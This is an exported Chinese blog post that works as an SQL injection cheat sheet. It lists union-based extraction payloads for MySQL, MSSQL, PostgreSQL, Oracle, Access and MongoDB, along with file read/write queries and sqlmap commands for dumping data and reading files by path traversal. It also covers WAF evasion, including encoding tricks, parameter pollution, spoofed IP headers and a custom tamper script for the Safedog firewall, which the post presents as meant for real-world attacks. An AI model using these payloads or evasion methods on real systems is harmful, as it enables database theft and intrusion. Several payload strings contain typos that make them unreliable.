{"id":10,"date":"2026-03-28T18:00:26","date_gmt":"2026-03-28T10:00:26","guid":{"rendered":"https:\/\/pumpk1n.icu\/?p=10"},"modified":"2026-05-09T11:16:12","modified_gmt":"2026-05-09T03:16:12","slug":"sql%e6%b3%a8%e5%85%a5","status":"publish","type":"post","link":"https:\/\/pumpk1n.icu\/index.php\/2026\/03\/28\/sql%e6%b3%a8%e5%85%a5\/","title":{"rendered":"SQL\u6ce8\u5165"},"content":{"rendered":"<h1>\u5224\u65ad\u6570\u636e\u5e93\u7c7b\u578b<\/h1>\n<pre><code>https:\/\/blog.csdn.net\/weixin_43749601\/article\/details\/115369123<\/code><\/pre>\n<h1>MYSQL\u6ce8\u5165<\/h1>\n<h2>\u57fa\u672c\u8bed\u53e5<\/h2>\n<h3>\u5224\u65ad\u6ce8\u5165\u70b9<\/h3>\n<p>\u8001\u65b9\u6cd5\uff1a\nand 1 = 1 \u9875\u9762\u6b63\u5e38\nand 1 = 2 \u9875\u9762\u9519\u8bef\n\u53ef\u80fd\u5b58\u5728\u6ce8\u5165\u70b9<\/p>\n<p>1.\u660e\u786e\u53c2\u6570\u7c7b\u578b<\/p>\n<ul>\n<li>\u6570\u5b57\uff0c\u5b57\u7b26\uff0c\u641c\u7d22\uff0cJOSN\u7b49<\/li>\n<\/ul>\n<p>2.\u660e\u786e\u8bf7\u6c42\u65b9\u6cd5<\/p>\n<ul>\n<li><code>$_GET<\/code>       \u4f7f\u7528get\u8bf7\u6c42\u53c2\u6570<\/li>\n<li><code>$_POST<\/code>     \u4f7f\u7528post\u8bf7\u6c42\u53c2\u6570<\/li>\n<li><code>$_COOKIE<\/code>  \u4f7f\u7528cookie\u8bf7\u6c42\u53c2\u6570<\/li>\n<li><code>$_REQUEST<\/code>\u4efb\u4f55\u65b9\u5f0f\u90fd\u53ef\u4ee5\u4f20\u5165\u53c2\u6570<\/li>\n<li><code>$_SERVER<\/code>  \u901a\u8fc7\u4f20\u5165HTTP\u5934\u53c2\u6570\u83b7\u53d6\u4fe1\u606f\uff08\u53ea\u9002\u7528\u4e8ephp\uff09<\/li>\n<\/ul>\n<p>SQL\u8bed\u53e5\u5e72\u6270\u7b26\u53f7<code>&#039;,&quot;,%,),}<\/code>\u7b49<\/p>\n<h3>\u5224\u65ad\u6ce8\u5165\u884c\u6570<\/h3>\n<p>?id=1 order by 1\n?id=1 order by 2\n?id=1 order by x<\/p>\n<h3>\u4fe1\u606f\u6536\u96c6<\/h3>\n<p>\u6570\u636e\u5e93\u7248\u672c\uff1aversion()\n\u6570\u636e\u5e93\u540d\u5b57\uff1adatabase()\n\u6570\u636e\u5e93\u7528\u6237\uff1auser()\n\u64cd\u4f5c\u7cfb\u7edf\uff1a@@version_compile_os<\/p>\n<h1>JOSN\u6ce8\u5165<\/h1>\n<pre><code>{&quot;name&quot;:&quot;111&quot;,&quot;passwd&quot;:&quot;111&quot;}\n\u6ce8\u5165\n{&quot;name&quot;:&quot;111&#039; and 1=1#&quot;}<\/code><\/pre>\n<h4>\u7206\u5e93<\/h4>\n<p>?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata<\/p>\n<h4>\u7206\u8868<\/h4>\n<p>?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='\u5df2\u77e5\u5e93\u540d'<\/p>\n<h4>\u7206\u5217<\/h4>\n<p>?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='\u5df2\u77e5\u8868\u540d'<\/p>\n<h4>\u83b7\u53d6\u6570\u636e<\/h4>\n<p>?id=-1 union select 1,2,group_concat(\u5df2\u77e5\u5b57\u6bb5\u540d,':',\u5df2\u77e5\u5b57\u6bb5\u540d) from \u5df2\u77e5\u8868\u540d<\/p>\n<h4>\u5c0f\u8d34\u58eb<\/h4>\n<p>\u5982\u679c\u9047\u5230\u4e0d\u540c\u6570\u636e\u5e93\u4e2d\u6709\u540c\u540d\u8868\u65f6\uff0c\u4f1a\u663e\u793a\u7b2c\u4e00\u4e2a\u521b\u5efa\u7684\u8868\uff0c\u6216\u5f53\u524d\u6570\u636e\u5e93\u4e2d\u7684\u8868\uff0c\u5982\u679c\u60f3\u8981\u67e5\u8be2\u7684\u8868\u5728\u4e0b\u9762\uff0c\u53ef\u4ee5\u540c\u65f6\u52a0\u4e0a\u6570\u636e\u5e93\u540d\u548c\u8868\u540d\nid=-1 union select group_concat(column_name),2 from information_schema.columns where table_schema=\"root\" and table_name=\"users\"<\/p>\n<h3>sql\u6ce8\u5165\u8bfb\u5199\u6587\u4ef6\uff08\u6ce8\u610f\u8def\u5f84\u7528\u201c\/\u201d\uff09<\/h3>\n<p>load_file()\uff1a\u8bfb\u53d6\u51fd\u6570<\/p>\n<pre><code>select load_file(&#039;c:\/pm.txt&#039;)<\/code><\/pre>\n<p>into outfile\u6216into dumpfile\uff1a\u5199\u5165\u51fd\u6570<\/p>\n<pre><code>select &#039;x&#039; into outfile &#039;d:\/pm.txt&#039;<\/code><\/pre>\n<h1>Access\u6ce8\u5165<\/h1>\n<p>access\u6570\u636e\u5e93<\/p>\n<ul>\n<li>\u8868\u540d -&gt; \u5217\u540d -&gt; \u6570\u636e\n\u5176\u4f59\u6570\u636e\u5e93<\/li>\n<li>\u6570\u636e\u5e93\u540d -&gt; \u8868\u540d -&gt; \u5217\u540d -&gt; \u6570\u636e<\/li>\n<\/ul>\n<p>access\u6ce8\u5165\u65f6\uff0c\u8868\u540d\u548c\u5217\u540d\u53ea\u80fd\u9760\u731c\n\u5982\u679c\u731c\u4e0d\u5230\u7684\u8bdd\uff1a<\/p>\n<h1>MSSQL\u6ce8\u5165<\/h1>\n<h3>\u5224\u65ad\u662f\u4e0d\u662fMSSQL\u6570\u636e\u5e93<\/h3>\n<pre><code>?id=1 and (select count(*) from sysobjects)&gt;0 --<\/code><\/pre>\n<h3>\u5224\u65ad\u6ce8\u5165\u70b9<\/h3>\n<p>and 1 = 1\nand 1 = 2<\/p>\n<h3>\u5224\u65ad\u5b57\u6bb5\u6570<\/h3>\n<pre><code>?id=-1 union all select null,null,unll,unll<\/code><\/pre>\n<p>\u5927\u4f53\u4e0emysql\u6ce8\u5165\u76f8\u4f3c\n\u53ef\u4ee5\u53c2\u8003<\/p>\n<pre><code>https:\/\/www.cnblogs.com\/lxfweb\/p\/12675023.html<\/code><\/pre>\n<h1>Postgre\u6ce8\u5165<\/h1>\n<p>\u57fa\u672c\u8bed\u53e5<\/p>\n<pre><code>\u83b7\u53d6\u6240\u6709\u7684\u6570\u636e\u5e93\nselect datname from pg_database;\n\n\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u4e0b\u6240\u6709\u7684\u8868\nselect tablename from pg_tables where schemaname = &#039;public&#039;\n\u6216\nselect table_name from information_schema.tables where table_schema=&#039;public&#039;\n\n\u83b7\u53d6\u5f53\u524d\u8868\u7684\u5217\u540d\nselect column_name from information_schema.columns where table_name = &#039;products&#039;;\n\n\u83b7\u53d6\u5f53\u524d\u8868\u7684\u503c\nselect name from products\n<\/code><\/pre>\n<h1>Oracle\u6ce8\u5165<\/h1>\n<p>Oracle \u4f7f\u7528\u67e5\u8be2\u8bed\u53e5\u83b7\u53d6\u6570\u636e\u65f6\u9700\u8981\u8ddf\u4e0a\u8868\u540d\uff0c\u5728\u6ca1\u6709\u8868\u7684\u60c5\u51b5\u4e0b\u53ef\u4ee5\u4f7f\u7528dual\uff0cdual\u662fOracle\u7684\u4e00\u4e2a\u865a\u62df\u8868\uff0c\u7528\u6765\u6784\u6210select\u7684\u8bed\u6cd5\u89c4\u5219\uff0c\u4e14Oracle\u4fdd\u8bc1dual\u91cc\u6c38\u8fdc\u53ea\u6709\u4e00\u6761\u8bb0\u5f55<\/p>\n<pre><code>union select 1,2 form dual<\/code><\/pre>\n<p>\u63a2\u6d4b\u5f53\u524d\u6570\u636e\u5e93\u7528\u6237<\/p>\n<pre><code>select user from dual;<\/code><\/pre>\n<p>\u83b7\u53d6\u7528\u6237\u6240\u62e5\u6709\u6743\u9650\u7684\u6570\u636e\u5e93<\/p>\n<pre><code>select distinct owner from all_tables<\/code><\/pre>\n<p>\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u4e2d\u7684\u8868(\u7531\u4e8eOracle \u4e2d\u4f7f\u7528 Schema \u7684\u6982\u5ff5\u5c06\u6bcf\u4e2a\u7528\u6237\u7684\u6570\u636e\u8fdb\u884c\u5206\u79bb\uff0cSchema \u5176\u5b9e\u7c7b\u4f3c\u4e8e\u547d\u540d\u7a7a\u95f4\u3002\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cSchema \u7684\u540d\u79f0\u540c\u7528\u6237\u540d\u79f0\u76f8\u540c)<\/p>\n<pre><code>-- \u6240\u6709\u7528\u6237\u7684\u8868\nselect distinct table_name from all_tables where owner = &#039;SYSTEM&#039;\n-- \u5f53\u524d\u7528\u6237\u7684\u8868\nselect table_name from user_tables;\n-- \u5305\u62ec\u7cfb\u7edf\u8868\nselect table_name from dba_tables where owner = &#039;SYSTEM&#039;;<\/code><\/pre>\n<p>\u83b7\u53d6\u5f53\u524dSYSTEM\u6570\u636e\u5e93\u4e2d\u8868USER\u8868\u7684\u5b57\u6bb5<\/p>\n<pre><code>select table_name from all_tables where owner=&#039;SYSTEM&#039; and table_name like &#039;USER%&#039;\n(\u4f7f\u7528like\u662f\u5305\u542b\u8868\u540d\u5305\u542bUSER\u7684\u8868\uff0c\u4e0d\u662f\u7b49\u4e8eUSER\u7684\u8868)\nselect column_name from all_tab_columns where table_name =&#039;USERS_KVHXKJ&#039;<\/code><\/pre>\n<p>\u83b7\u53d6\u503c<\/p>\n<pre><code>select USERNAME_ETSGGX,PASSWORD_OEDQBQ from USERS_KVHXKJ<\/code><\/pre>\n<h1>MangoDB\u6ce8\u5165<\/h1>\n<p>\u83b7\u53d6\u6240\u6709\u5b57\u6bb5\u540d<\/p>\n<pre><code>id=1&#039;}); return Object.keys(this); var dummy=&#039;<\/code><\/pre>\n<p>\u67e5\u8be2\u56de\u663e\u4f4d\u7f6e<\/p>\n<pre><code>id=1&#039;});return ({&#039;title&#039;:&#039;1&#039;,&#039;content&#039;:&#039;2<\/code><\/pre>\n<p>\u67e5\u8be2\u6570\u636e\u5e93\u540d\u79f0<\/p>\n<pre><code>id=1&#039;});return ({&#039;title&#039;:tojson(db),&#039;content&#039;:&#039;2<\/code><\/pre>\n<p>\u67e5\u8be2\u8868\u540d\u79f0<\/p>\n<ul>\n<li><code>getCollectionNames()<\/code>\uff1a\u8fd4\u56de\u6240\u6709\u96c6\u5408\u540d\u79f0\u6570\u7ec4\n<pre><code>id=1&#039;});return ({&#039;title&#039;:tojson(db.getCollectionNames()),&#039;content&#039;:&#039;2<\/code><\/pre><\/li>\n<\/ul>\n<p>\u67e5\u8be2\u5b57\u6bb5\u7ed3\u6784<\/p>\n<ul>\n<li><code>Authority_confidential<\/code>\uff1a\u76ee\u6807\u96c6\u5408\u540d<\/li>\n<li><code>find()[0]<\/code>\uff1a\u83b7\u53d6\u96c6\u5408\u7b2c\u4e00\u6761\u8bb0\u5f55<\/li>\n<li><code>find()[1]<\/code>\uff1a\u83b7\u53d6\u96c6\u5408\u7b2c\u4e8c\u6761\u8bb0\u5f55\n<pre><code>id=1&#039;});return ({&#039;title&#039;:tojson(db.Authority_confidential.find()[0]),&#039;content&#039;:&#039;2<\/code><\/pre><\/li>\n<\/ul>\n<h1>Access\u504f\u79fb\u6ce8\u5165<\/h1>\n<p>access\u6570\u636e\u5e93\u6ca1\u6709\u7c7b\u4f3c\u4e8emysql\u7684information_schema\u8fd9\u6837\u7684\u7cfb\u7edf\u7d22\u5f15\u5e93\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u80fd\u6839\u636e\u7ecf\u9a8c\u9760\u731c\u4e86<\/p>\n<pre><code>?id=1513 and exists(select * from admin)<\/code><\/pre>\n<p>\u786e\u5b9a\u76ee\u6807\u8868\u7684\u5b57\u6bb5\u6570\u91cf<\/p>\n<pre><code>?id=1513 and exists(select * from admin order by 6)<\/code><\/pre>\n<p>\u504f\u79fb\u6ce8\u5165\u7684\u57fa\u672c\u516c\u5f0f<\/p>\n<ul>\n<li>\u8054\u5408\u67e5\u8be2\u6240\u8981\u8865\u5145\u7684\u5b57\u6bb5\u6570 = \u5f53\u524d\u5b57\u6bb5\u6570\u91cf - \u76ee\u6807\u8868\u7684\u5b57\u6bb5\u6570 x N<\/li>\n<\/ul>\n<p>\u4e00\u7ea7\u6ce8\u5165<\/p>\n<pre><code>?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin<\/code><\/pre>\n<p>\u4e8c\u7ea7\u6ce8\u5165<\/p>\n<pre><code>?id=1513 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)<\/code><\/pre>\n<h1>\u4f7f\u7528sqlmap<\/h1>\n<h2>\u57fa\u672c\u8bed\u6cd5<\/h2>\n<pre><code>python sqlmap.py -r \u6293\u5305\u6587\u4ef6 --batch --file-read &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/\/filename&quot; --tamper &quot;space2comment&quot; <\/code><\/pre>\n<p>\u7136\u540e\u53bb\u7ed3\u679c\u6587\u4ef6\u4e2d\u627e\u7b54\u6848<\/p>\n<h3>sqlmap\u8131\u5e93<\/h3>\n<pre><code>python sqlmap.py -r \u6293\u5305\u6587\u4ef6 --dump<\/code><\/pre>\n<p>\u6216\u8005\u4f7f\u7528sqlmap\u57fa\u7840\u7206\u7834\u65b9\u6cd5<a href=\"sqlmap\" target=\"_blank\"  rel=\"nofollow\" >sqlmap<\/a>  <\/p>\n<h3>waf\u7ed5\u8fc7sql\u6ce8\u5165<\/h3>\n<p>\u6570\u636e<\/p>\n<ul>\n<li>\u5927\u5c0f\u5199\n<pre><code>id=-1 uNIoN sELecT 1,2,3#<\/code><\/pre><\/li>\n<li>\u52a0\u5bc6\u89e3\u5bc6<\/li>\n<li>\u7f16\u7801\u89e3\u7801\n<pre><code>id=-1%252f%252a*\/UNION%252f%252a \/SELECT<\/code><\/pre><\/li>\n<li>\u7b49\u4ef7\u51fd\u6570<\/li>\n<li>\u7279\u6b8a\u7b26\u53f7<\/li>\n<li>\u53cd\u5e8f\u5217\u5316<\/li>\n<li>\u6ce8\u91ca\u7b26\u6df7\u7528\n<pre><code>id=-1 union select 1,2,3#\nid=-1 union%23a%20select 1,2,3#    %23\u662f#,a\u7528\u6765\u622a\u65ad\u5339\u914d,%20\u6362\u884c\u7b26<\/code><\/pre><\/li>\n<li>\u5185\u8054\u6ce8\u91ca\n<pre><code>\/*!xxxxxx*\/ \u8fdb\u884c\u6ce8\u5165\u65f6mysql\u4f1a\u628a!\u540e\u9762\u7684\u5f53\u4f5csql\u8bed\u53e5\u76f4\u63a5\u6267\u884c\n\u6ce8\u610f\uff1a\u5728!\u540e\u9762\u52a0\u4e0a\u7248\u672c\u53f7\n\u5f53!\u540e\u9762\u63a5\u7684\u6570\u636e\u5e93\u7248\u672c\u53f7\u5c0f\u4e8e\u81ea\u8eab\u7248\u672c\u53f7\uff0c\u5c31\u4f1a\u5c06\u6ce8\u91ca\u4e2d\u7684\u5185\u5bb9\u6267\u884c\n\u5f53!\u540e\u9762\u63a5\u7684\u6570\u636e\u5e93\u7248\u672c\u53f7\u5927\u4e8e\u81ea\u8eab\u7248\u672c\u53f7\uff0c\u5c31\u4f1a\u5f53\u4f5c\u6ce8\u91ca\u6765\u5904\u7406<\/code><\/pre>\n<p>\u65b9\u5f0f<\/p><\/li>\n<li>\u66f4\u6539\u63d0\u4ea4\u65b9\u5f0f<\/li>\n<li>\u53d8\u5f02\n\u5176\u4ed6<\/li>\n<li>Fuzz\u5927\u6cd5\n<pre><code>\u8fd9\u4e0d\u662f\u4e00\u4e2a\u5de5\u5177\uff0c\u8fd9\u662f\u4e00\u79cd\u601d\u60f3\uff0c\u7c7b\u4f3c\u4e8e\u7206\u7834\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u7f16\u5199\u5b57\u5178\uff0c\u7136\u540e\u66ff\u6362\u6ce8\u91ca\u7b26\u8fdb\u884c\u7ed5\u8fc7<\/code><\/pre><\/li>\n<li>\u6570\u636e\u5e93\u7279\u6027<\/li>\n<li>\u5783\u573e\u6570\u636e\u6ea2\u51fa<\/li>\n<li>HTTP\u53c2\u6570\u6c61\u67d3\n<pre><code>id=-1 union select 1,2,3#\nid=1\/**&amp;id=-1%20union%20select%201,2,3%23*\/\n\u5b89\u5168\u72d7\u6536\u5230\u4e24\u4e2a\u53c2\u6570 1 \/**-1%20union%20select%201,2,3%23*\/  \u540e\u9762\u6ce8\u91ca\u7ed5\u8fc7\n\u4f46\u662f\u6570\u636e\u5e93\u4f1a\u6267\u884c\u540e\u9762\u90a3\u4e2a -1%20union%20select%201,2,3%23<\/code><\/pre><\/li>\n<\/ul>\n<p><strong>\u65b9\u5f0f\u4e00:IP\u767d\u540d\u5355<\/strong>\n\u4ece\u7f51\u7edc\u5c42\u83b7\u53d6\u7684ip\uff0c\u8fd9\u79cd\u4e00\u822c\u4f2a\u9020\u4e0d\u6765\uff0c\u5982\u679c\u662f\u83b7\u53d6\u5ba2\u6237\u7aef\u7684IP\uff0c\u8fd9\u6837\u5c31\u53ef\u80fd\u5b58\u5728\u4f2a\u9020Ip\u7ed5\u8fc7\u7684\u60c5\u51b5\u3002\n\u6d4b\u8bd5\u65b9\u6cd5:\u4fee\u6539nttp\u7684header\u6765bypass waf<\/p>\n<pre><code>x-forwarded-for\nx-remote-IP\nx-originating-\u5de5P\nx-remote-addr\nx-Real-ip<\/code><\/pre>\n<p><strong>\u65b9\u5f0f\u4e8c:\u9759\u6001\u8d44\u6e90<\/strong>\n\u7279\u5b9a\u7684\u9759\u6001\u8d44\u6e90\u540e\u7f00\u8bf7\u6c42\uff0c\u5e38\u89c1\u7684\u9759\u6001\u6587\u4ef6(.js .jpg .swf .css\u7b49\u7b49)\uff0c\u7c7b\u4f3c\u767d\u540d\u5355\u673a\u5236,waf\u4e3a\u4e86\u68c0\u6d4b\u6548\u7387\uff0c\u4e0d\u53bb\u68c0\u6d4b\u8fd9\u6837\u4e00\u4e9b\u9759\u6001\u6587\u4ef6\u540d\u540e\u7f00\u7684\u8bf7\u6c42\u3002<\/p>\n<pre><code>http:\/\/10.s.9.201\/sql.php ?id=1\nhttp:\/\/10.9.9.201\/sql.php\/1.j=?id=1<\/code><\/pre>\n<p>\u5907\u6ce8: aapx\/php\u53ea\u8bc6\u522b\u5230\u524d\u9762\u7684.aspx\/ .php\u540e\u9762\u57fa\u672c\u4e0d\u8bc6\u522b<\/p>\n<p><strong>\u65b9\u5f0f\u4e09:url\u767d\u540d\u5355<\/strong>\n\u4e3a\u4e86\u9632\u6b62\u8bef\u62e6\uff0c\u90e8\u5206waf\u5185\u7f6e\u9ed8\u8ba4\u7684\u767d\u540d\u5355\u5217\u8868\uff0c\u5982acmin\/managerl system\u7b49\u7ba1\u7406\u540e\u53f0\u3002\u53ea\u8981url\u4e2d\u5b58\u5728\u767d\u540d\u5355\u7684\u5b57\u7b26\u4e32\uff0c\u5c31\u4f5c\u4e3a\u767d\u540d\u5355\u4e0d\u8fdb\u884c\u68c0\u6d4b\u3002\u5e38\u89c1\u7684uzl\u6784\u9020\u59ff\u52bf:<\/p>\n<pre><code>http:\/\/10.s.s.201\/=ql.php\/admin.php?id=1\nhttp:\/\/10.9.9.201\/sql.php?a=\/manage\/&amp;b=..\/etc\/passwd\nhttp:\/\/10.9.s.201\/..\/..\/..\/manage\/..\/sql.asp?id=2<\/code><\/pre>\n<p>waf\u901a\u8fc7\/manage\/\"\u8fdb\u884c\u6bd4\u8f83\uff0c\u53ea\u8981uri\u4e2d\u5b58\u5728\/manage\/\u5c31\u4f5c\u4e3a\u767d\u540d\u5355\u4e0d\u8fdb\u884c\u68c0\u6d4b\uff0c\u8fd9\u6837\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\/sql.php?a=\/ manage\/&amp;b=..\/etc\/passwcl\u7ed5\u8fc7\u9632\u5fa1\u89c4\u5219\u3002<\/p>\n<h3>sqlmap\u7ed5\u8fc7waf<\/h3>\n<p>\u4f7f\u7528sqlmap\u7684tamper\u811a\u672c\u8fdb\u884c\u7ed5\u8fc7\n\u4f46\u662f\u81ea\u5e26\u7684\u811a\u672c\u53ea\u80fd\u7ed5\u8fc7ctf\u6bd4\u8d5b\u90a3\u79cd\u9898\u76ee\uff0c\u5b9e\u6218\u4e2d\u9700\u8981\u81ea\u5df1\u7f16\u5199<\/p>\n<p>sqlmap\u7ed5\u8fc7\u5b89\u5168\u72d7\n\u9996\u5148\u7f16\u5199bypassdog.py\u6587\u4ef6<\/p>\n<pre><code>#!\/usr\/bin\/env python\n\nimport re\n\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.enums import PRIORITY\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    if payload:\n        payload = payload.replace(&quot; &quot;,&quot;\/*\/!%!\/*\/&quot;)\n        payload = payload.replace(&quot;()&quot;,&quot;(\/*\/!%!\/*\/)&quot;)\n        payload = re.sub(r&quot;(?i)(INFORMATION_SCHEMA.SCHEMATA)&quot;,r&quot;\/*!00000--%20\/*%\/%0aINFORMATION_SCHEMA.SCHEMATA*\/&quot;,payload)\n        payload = re.sub(r&quot;(?i)(INFORMATION_SCHEMA.TABLES)&quot;,r&quot;\/*!00000--%20\/*%\/%0aINFORMATION_SCHEMA.TABLES*\/&quot;,payload)\n        payload = re.sub(r&quot;(?i)(INFORMATION_SCHEMA.COLUMNS)&quot;,r&quot;\/*!00000--%20\/*%\/%0aINFORMATION_SCHEMA.COLUMNS*\/&quot;,payload)\n        payload = re.sub(r&quot;(?i)(\/AS\/)&quot;,r&quot;\/\/*!00000--%20\/*%\/%0aAS*\/\/&quot;,payload)        \n\n    return payload<\/code><\/pre>\n<p>\u5176\u5b9e\u5c31\u662f\u6839\u636e\u524d\u9762\u7684\u624b\u6ce8\u6765\u4fee\u6539payload<\/p>\n<p>\u7136\u540e\u4f7f\u7528sqlmap<\/p>\n<pre><code>sqlmap.py -u &quot;http:\/\/192.168.13.131\/sqli-labs\/Less-2\/?id=1&quot; --tamper &quot;bypassdog.py&quot; --proxy &quot;http:\/\/127.0.0.1:8080\/&quot; --random-agent<\/code><\/pre>\n<ul>\n<li>--tamper \"bypassdog.py\"  \u4f7f\u7528\u7684\u811a\u672c<\/li>\n<li><code>--proxy &quot;http:\/\/127.0.0.1:8080\/&quot;<\/code>  \u6302\u4ee3\u7406\uff0c\u4f7f\u7528burpsuit\u67e5\u770b\u7206\u7834\u60c5\u51b5<\/li>\n<li>--random-agent   \u4f7f\u7528\u968f\u673ahttp\u5934\uff0cslqmap\u7684\u5934\u4f1a\u88ab\u68c0\u6d4b\u5230<\/li>\n<\/ul>\n<p>\u5982\u679c\u5bf9\u65b9\u5f00\u542f\u4e86\u6d41\u91cf\u63a7\u5236\uff0c\u90a3\u4e48\u6211\u4eec\u4f7f\u7528sqlmap\u7206\u7834\u65f6\uff0c\u4f1a\u56e0\u4e3a\u901f\u5ea6\u592a\u5feb\uff0c\u5c01\u7981\u6211\u4eec\u7684ip<\/p>\n<p>1.\u53ef\u4ee5\u4f7f\u7528\u5230\u6d4f\u89c8\u5668\u722c\u866bhttp\u5934<\/p>\n<pre><code>sqlmap.py -u &quot;http:\/\/192.168.13.131\/sqli-labs\/Less-2\/?id=1&quot; --tamper &quot;bypassdog.py&quot; --proxy &quot;http:\/\/127.0.0.1:8080\/&quot; --user-agent=&quot;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/64.0.3282.140 Safari\/537.36 Edge\/18.17763&quot;<\/code><\/pre>\n<ul>\n<li>--user-agent=  \u8bbe\u7f6e\u4e3a\u641c\u7d22\u5f15\u64ce\u7684http\u5934\uff0c\u53ef\u4ee5\u8fdb\u884c\u722c\u866b<\/li>\n<\/ul>\n<p>2.\u53ef\u4ee5\u4f7f\u7528\u5ef6\u8fdf\u6ce8\u5165<\/p>\n<pre><code>sqlmap.py -u &quot;http:\/\/192.168.13.131\/sqli-labs\/Less-2\/?id=1&quot; --tamper &quot;bypassdog.py&quot; --proxy &quot;http:\/\/127.0.0.1:8080\/&quot; --random-agent --delay 1\n\u6216\u8005\nsqlmap.py -u &quot;http:\/\/192.168.13.131\/sqli-labs\/Less-2\/?id=1&quot; --tamper &quot;bypassdog.py&quot; --proxy &quot;http:\/\/127.0.0.1:8080\/&quot; --random-agent --safe-freq 3<\/code><\/pre>\n<ul>\n<li>--delay 1 <\/li>\n<li>--safe-freq 3<\/li>\n<\/ul>\n<p>3.\u672c\u5730\u811a\u672c\nsqlmap\u53bb\u6ce8\u5165\u672c\u5730\u811a\u672c -&gt; \u672c\u5730\u642d\u5efa\u811a\u672c\uff08\u8bf7\u6c42\u6570\u636e\u5305\u81ea\u5b9a\u4e49\u7f16\u5199\uff09-&gt; \u8fdc\u7a0b\u5730\u5740\n(\u4e0d\u592a\u4f1a\u7528)<\/p>\n<pre><code>&lt;?php\n$data = array(&lsquo;foo&#039; =&gt; &lsquo;bar&#039;);\n$data = http_build_query($data);\n$opts = array(&#039;http&#039; =&gt; array(&#039;method&#039; =&gt; &#039;POST&#039;, &#039;header&#039; =&gt; &#039;Content-type: application\/x-www-form-urlencodedrn&#039; . &#039;Content-Length: &#039; . strlen($data) . &#039;\\r\\n&#039;, &#039;content&#039; =&gt; $data));\n$context = stream_context_create($opts);\n$html = file_get_contents(&#039;https:\/\/wenda.shukaming.com&#039;, false, $context);\necho $html;\n?&gt;<\/code><\/pre>","protected":false},"excerpt":{"rendered":"<p>\u5224\u65ad\u6570\u636e\u5e93\u7c7b\u578b <a href=\"https:\/\/blog.csdn.net\/weixin_43749601\/article\/details\/115\">https:\/\/blog.csdn.net\/weixin_43","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[6,7],"tags":[],"class_list":["post-10","post","type-post","status-publish","format-standard","hentry","category-owasp","category-sql"],"_links":{"self":[{"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/posts\/10","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/comments?post=10"}],"version-history":[{"count":7,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/posts\/10\/revisions"}],"predecessor-version":[{"id":39,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/posts\/10\/revisions\/39"}],"wp:attachment":[{"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/media?parent=10"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/categories?post=10"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/tags?post=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}